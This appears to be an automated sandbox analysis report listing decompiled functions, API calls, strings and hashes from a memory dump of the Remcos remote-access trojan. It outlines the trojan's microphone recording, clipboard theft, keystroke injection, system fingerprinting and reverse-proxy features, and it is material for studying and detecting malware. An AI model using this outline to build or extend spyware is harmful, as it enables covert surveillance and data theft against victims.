                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                    • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                    • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                    • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                    Function 00447E4A Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370timeCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00447ECC
                                                    • _free.LIBCMT ref: 00447EF0
                                                    • _free.LIBCMT ref: 00448077
                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                    • _free.LIBCMT ref: 00448243
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                    • String ID: Zb1Y/
                                                    • API String ID: 314583886-3232713500
                                                    • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                    • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                                    • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                    • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                                    Function 00444409 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                    • _free.LIBCMT ref: 00444724
                                                    • _free.LIBCMT ref: 0044473D
                                                    • _free.LIBCMT ref: 0044476F
                                                    • _free.LIBCMT ref: 00444778
                                                    • _free.LIBCMT ref: 00444784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                    • String ID: C$Zb1Y/
                                                    • API String ID: 1679612858-1916750779
                                                    • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                    • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                    • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                    • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                    Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Eventinet_ntoa
                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                    • API String ID: 3578746661-4192532303
                                                    • Opcode ID: 3b117b629b3bdaa18b774d6fa515516e8e6a044dc87e94f0a9700addc1d69c3b
                                                    • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                    • Opcode Fuzzy Hash: 3b117b629b3bdaa18b774d6fa515516e8e6a044dc87e94f0a9700addc1d69c3b
                                                    • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                    Function 0044A0D3 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                    • __fassign.LIBCMT ref: 0044A190
                                                    • __fassign.LIBCMT ref: 0044A1AB
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                    • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                    • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1324828854-3232713500
                                                    • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                    • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                    • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                    • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                    Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • Sleep.KERNEL32(00000064), ref: 00416688
                                                    • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                    • API String ID: 1462127192-2001430897
                                                    • Opcode ID: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                    • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                    • Opcode Fuzzy Hash: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                    • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                    Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _strftime.LIBCMT ref: 00401AD3
                                                      • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                    • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                    • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                    • API String ID: 3809562944-3643129801
                                                    • Opcode ID: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                    • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                    • Opcode Fuzzy Hash: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                    • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                    Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                    • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                    • waveInStart.WINMM ref: 00401A81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                    • String ID: XCG$`=G$x=G
                                                    • API String ID: 1356121797-903574159
                                                    • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                    • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                    • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                    • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                    Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                      • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                      • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                      • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                    • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                    • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                    • TranslateMessage.USER32(?), ref: 0041CA0B
                                                    • DispatchMessageA.USER32(?), ref: 0041CA15
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                    • String ID: Remcos
                                                    • API String ID: 1970332568-165870891
                                                    • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                    • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                    • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                    • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                    Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                    • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                    • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                    • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                    Function 00446169 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 389COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16
                                                    • String ID: Zb1Y/$a/p$am/pm$fD
                                                    • API String ID: 3509577899-3962523610
                                                    • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                    • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                    • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                    • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                    Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tcp$udp
                                                    • API String ID: 0-3725065008
                                                    • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                    • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                    • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                    • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                    Function 00443F8B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • _free.LIBCMT ref: 00444096
                                                    • _free.LIBCMT ref: 004440AD
                                                    • _free.LIBCMT ref: 004440CC
                                                    • _free.LIBCMT ref: 004440E7
                                                    • _free.LIBCMT ref: 004440FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$AllocateHeap
                                                    • String ID: Z7D$Zb1Y/
                                                    • API String ID: 3033488037-2760453993
                                                    • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                    • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                    • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                    • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                    Function 00437A90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                    • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: Zb1Y/$csm
                                                    • API String ID: 1170836740-1781008971
                                                    • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                    • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                    • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                    • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                    Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                      • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                      • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                    • String ID: .part
                                                    • API String ID: 1303771098-3499674018
                                                    • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                    • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                    • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                    • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                    Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                      • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                      • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                    • _wcslen.LIBCMT ref: 0041A906
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                    • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                    • API String ID: 37874593-703403762
                                                    • Opcode ID: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                    • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                    • Opcode Fuzzy Hash: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                    • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                    Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                      • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                      • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                      • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                    • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentOpenProcessQueryValue
                                                    • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                    • API String ID: 1866151309-3211212173
                                                    • Opcode ID: 9b9183aef67563fec3e0b5301fe16ff2c459ff8b00ce5db537e54f339134e2ff
                                                    • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                    • Opcode Fuzzy Hash: 9b9183aef67563fec3e0b5301fe16ff2c459ff8b00ce5db537e54f339134e2ff
                                                    • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                                    Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendInput.USER32 ref: 00418B18
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                      • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InputSend$Virtual
                                                    • String ID:
                                                    • API String ID: 1167301434-0
                                                    • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                    • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                    • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                    • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                    Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32 ref: 00415A46
                                                    • EmptyClipboard.USER32 ref: 00415A54
                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                    • OpenClipboard.USER32 ref: 00415A61
                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                    • CloseClipboard.USER32 ref: 00415A89
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                    • String ID:
                                                    • API String ID: 2172192267-0
                                                    • Opcode ID: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                    • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                    • Opcode Fuzzy Hash: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                    • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                    Function 0044017A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Zb1Y/
                                                    • API String ID: 0-3232713500
                                                    • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
